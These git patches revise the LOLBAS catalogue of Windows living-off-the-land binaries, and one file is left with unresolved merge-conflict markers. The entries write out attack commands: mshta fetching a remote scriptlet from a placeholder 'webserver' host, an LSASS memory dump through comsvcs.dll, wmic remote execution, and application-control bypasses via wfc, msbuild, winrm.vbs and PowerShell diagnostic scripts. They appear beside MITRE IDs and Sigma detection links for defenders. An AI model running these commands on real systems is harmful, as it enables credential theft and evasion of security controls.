Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: VisualUiaVerifyNative.exe - Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. - Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1218 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe -Code_Sample: - - Code: -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: As a Windows SDK binary, execution on a system may be suspicious -Resources: - - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ - - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad -Acknowledgement: - - Person: Lee Christensen - Handle: '@tifkin' - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: VisualUiaVerifyNative.exe +Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: VisualUiaVerifyNative.exe + Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. + Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1218 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe +Code_Sample: + - Code: +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: As a Windows SDK binary, execution on a system may be suspicious +Resources: + - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ + - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad +Acknowledgement: + - Person: Lee Christensen + Handle: '@tifkin' + - Person: Jimmy + Handle: '@bohops' +--- diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml index 13e6a11..8ed47a3 100644 --- a/yml/OtherMSBinaries/Wfc.yml +++ b/yml/OtherMSBinaries/Wfc.yml @@ -1,28 +1,28 @@ ---- -Name: Wfc.exe -Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK). -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: wfc.exe c:\path\to\test.xoml - Description: Execute arbitrary C# code embedded in a XOML file. - Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe -Code_Sample: - - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: As a Windows SDK binary, execution on a system may be suspicious -Resources: - - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Acknowledgement: - - Person: Matt Graeber - Handle: '@mattifestation' - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: Wfc.exe +Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK). +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: wfc.exe c:\path\to\test.xoml + Description: Execute arbitrary C# code embedded in a XOML file. + Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe +Code_Sample: + - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: As a Windows SDK binary, execution on a system may be suspicious +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Matt Graeber + Handle: '@mattifestation' + - Person: Jimmy + Handle: '@bohops' +--- From b92ee99627d84fd17697e513960a3c423ff2dd34 Mon Sep 17 00:00:00 2001 From: Wietze Date: Thu, 5 May 2022 11:12:22 +0100 Subject: [PATCH 06/11] Addressing @bohops's feedback --- yml/OSBinaries/Jsc.yml | 6 +++--- yml/OSBinaries/Mmc.yml | 2 +- yml/OSBinaries/Msbuild.yml | 17 +++++++++-------- yml/OSBinaries/Mshta.yml | 8 ++++---- yml/OSBinaries/Wmic.yml | 21 --------------------- yml/OSLibraries/Advpack.yml | 2 +- yml/OSLibraries/Ieadvpack.yml | 2 +- yml/OSLibraries/Mshtml.yml | 2 +- yml/OSLibraries/comsvcs.yml | 2 +- yml/OSScripts/Syncappvpublishingserver.yml | 2 +- yml/OSScripts/Winrm.yml | 6 +++--- 11 files changed, 25 insertions(+), 45 deletions(-) diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index 9bfb036..5356363 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml @@ -1,18 +1,18 @@ --- Name: Jsc.exe -Description: Binary file used by .NET to compile javascript code to .exe or .dll format +Description: Binary file used by .NET to compile JavaScript code to .exe or .dll format Author: 'Oddvar Moe' Created: 2019-05-31 Commands: - Command: jsc.exe scriptfile.js - Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe. + Description: Use jsc.exe to compile JavaScript code stored in scriptfile.js and output scriptfile.exe. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: jsc.exe /t:library Library.js - Description: Use jsc.exe to compile javascript code stored in Library.js and output Library.dll. + Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index 4f31b21..77453bf 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218.014 - OperatingSystem: Windows 10 (and possibly earlier versions) + OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 - Command: mmc.exe gpedit.msc Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC. Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL. diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index 5ef010d..c649545 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -18,15 +18,8 @@ Commands: Privileges: User MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: msbuild.exe @sample.rsp - Description: Executes Logger statements from rsp file - Usecase: Execute DLL - Category: Execute - Privileges: User - MitreID: T1127.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo - Description: Executes generated Logger dll file with TargetLogger export + Description: Executes generated Logger DLL file with TargetLogger export Usecase: Execute DLL Category: Execute Privileges: User @@ -39,6 +32,13 @@ Commands: Privileges: User MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + - Command: msbuild.exe @sample.rsp + Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. + Usecase: Bypass command-line based detections + Category: Execute + Privileges: User + MitreID: T1036 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe @@ -69,6 +69,7 @@ Resources: - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ - Link: https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191 - Link: https://github.com/LOLBAS-Project/LOLBAS/issues/165 + - Link: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files - Link: https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events Acknowledgement: - Person: Casey Smith diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index 2822620..999de1b 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -11,14 +11,14 @@ Commands: Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) + - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) Description: Executes VBScript supplied as a command line argument. Usecase: Execute code Category: Execute Privileges: User MitreID: T1218.005 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close(); + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + - Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close(); Description: Executes JavaScript supplied as a command line argument. Usecase: Execute code Category: Execute @@ -36,7 +36,7 @@ Full_Path: - Path: C:\Windows\System32\mshta.exe - Path: C:\Windows\SysWOW64\mshta.exe Code_Sample: - - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct + - Code: https://gist.github.com/bohops/6ded40c4989c673f2e30b9a6c1985019 Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/05c58b4892942c34bfa01e9ada88ef2663858e1c/rules/windows/process_creation/win_susp_mshta_pattern.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_invoke_obfuscation_via_use_mhsta.yml diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index ac38398..8b5c3c5 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -18,13 +18,6 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" - Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well. - Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures - Category: Execute - Privileges: User - MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" Description: Execute evil.exe on the remote system. Usecase: Execute binary on a remote system @@ -32,20 +25,6 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" - Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm. - Usecase: Execute binary with scheduled task created with wmic on a remote computer - Category: Execute - Privileges: User - MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" - Description: Create a volume shadow copy of NTDS.dit that can be copied. - Usecase: Execute binary on remote system - Category: Execute - Privileges: User - MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" Description: Create a volume shadow copy of NTDS.dit that can be copied. Usecase: Execute binary on remote system diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index b015321..8ee42f4 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -15,7 +15,7 @@ Commands: Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass - Privileges: Admin + Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe advpack.dll,RegisterOCX test.dll diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 631c1f1..5b7c822 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -15,7 +15,7 @@ Commands: Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass - Privileges: Admin + Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 40850c9..ce0ff3f 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml @@ -5,7 +5,7 @@ Author: Created: 2018-05-25 Commands: - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" - Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box). + Description: "Invoke an HTML Application via mshta.exe (note: pops a security warning and a print dialogue box)." Usecase: Launch an HTA application. Category: Execute Privileges: User diff --git a/yml/OSLibraries/comsvcs.yml b/yml/OSLibraries/comsvcs.yml index 7a9c41b..c9082b0 100644 --- a/yml/OSLibraries/comsvcs.yml +++ b/yml/OSLibraries/comsvcs.yml @@ -4,7 +4,7 @@ Description: COM+ Services Author: Created: 2019-08-30 Commands: - - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full" + - Command: powershell /c rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump. Usecase: Dump Lsass.exe process memory to retrieve credentials. Category: Dump diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml index fb6aa06..b8fb730 100644 --- a/yml/OSScripts/Syncappvpublishingserver.yml +++ b/yml/OSScripts/Syncappvpublishingserver.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1216 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs Code_Sample: diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index c108ab3..c661ffb 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -19,11 +19,11 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10, Windows 11 - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty' - Description: Bypass AWL solutions by copying and executing cscript.exe and malicious XSL documents from attacker controlled location - Usecase: Execute aribtrary, unsigned code via XSL script + Description: Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe. + Usecase: Execute arbitrary, unsigned code via XSL script Category: AWL Bypass Privileges: User - MitreID: T1216 + MitreID: T1220 OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\winrm.vbs From 2b2099837109301e582f4758a3d56734ca2f4eac Mon Sep 17 00:00:00 2001 From: Wietze Date: Thu, 5 May 2022 11:16:19 +0100 Subject: [PATCH 07/11] Remove redundant powershell command from comsvcs entry --- yml/OSLibraries/comsvcs.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSLibraries/comsvcs.yml b/yml/OSLibraries/comsvcs.yml index c9082b0..2cf0221 100644 --- a/yml/OSLibraries/comsvcs.yml +++ b/yml/OSLibraries/comsvcs.yml @@ -4,7 +4,7 @@ Description: COM+ Services Author: Created: 2019-08-30 Commands: - - Command: powershell /c rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full + - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump. Usecase: Dump Lsass.exe process memory to retrieve credentials. Category: Dump From 400158f2df81279cf245e8ad27f6cadbad5fb347 Mon Sep 17 00:00:00 2001 From: Wietze Date: Fri, 2 Sep 2022 17:16:58 +0100 Subject: [PATCH 08/11] Add sigma references to CL_LoadAssembly, CLMutexVerifiers entries (#221) --- yml/OSScripts/CL_LoadAssembly.yml | 28 ++++++++++++++++++++++++++++ yml/OSScripts/CL_mutexverifiers.yml | 1 + 2 files changed, 29 insertions(+) diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index c9ca1ab..5954984 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -1,3 +1,4 @@ +<<<<<<< HEAD --- Name: CL_LoadAssembly.ps1 Description: PowerShell Diagnostic Script @@ -22,3 +23,30 @@ Acknowledgement: - Person: Jimmy Handle: '@bohops' --- +======= +--- +Name: CL_LoadAssembly.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: 'powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1216 + OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 +Full_Path: + - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 +Code_Sample: + - Code: +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml +Resources: + - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' +--- +>>>>>>> 9135005 (Add sigma references to CL_LoadAssembly, CLMutexVerifiers entries (#221)) diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 3f8748e..5877b72 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -20,6 +20,7 @@ Full_Path: Code_Sample: - Code: Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_mutexverifiers.yml Resources: - Link: https://twitter.com/pabraeken/status/995111125447577600 Acknowledgement: From 4b99cadd85ddec827fa4420a1171dc6b9fece324 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Tue, 23 Aug 2022 15:44:57 +0200 Subject: [PATCH 09/11] Update pester.bat with an additional example --- yml/OSScripts/pester.yml | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index 842c3b3..ba5980f 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -11,6 +11,13 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + - Command: Pester.bat ;calc.exe + Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat @@ -20,7 +27,10 @@ Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_pester.yml Resources: - Link: https://twitter.com/Oddvarmoe/status/993383596244258816 + - Link: https://twitter.com/_st0pp3r_/status/1560072680887525378 Acknowledgement: - Person: Emin Atac Handle: '@p0w3rsh3ll' + - Person: Stamatis Chatzimangou + Handle: '@_st0pp3r_' --- From 5a38aa722f7596ed8b5896fff9360f0451af7bf9 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Tue, 23 Aug 2022 15:47:17 +0200 Subject: [PATCH 10/11] Adjusted comment in command --- yml/OSScripts/pester.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index ba5980f..38a15ca 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10, Windows 11 - Command: Pester.bat ;calc.exe - Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad + Description: Execute code using Pester. Example here executes calc.exe Usecase: Proxy execution Category: Execute Privileges: User From c5c227a7ba7ff33556645e7e335a0b0931165c5f Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Wed, 24 Aug 2022 12:32:48 +0200 Subject: [PATCH 11/11] added sigma detection for pester --- yml/OSScripts/pester.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index 38a15ca..7d85b52 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -25,6 +25,7 @@ Code_Sample: - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_pester.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml Resources: - Link: https://twitter.com/Oddvarmoe/status/993383596244258816 - Link: https://twitter.com/_st0pp3r_/status/1560072680887525378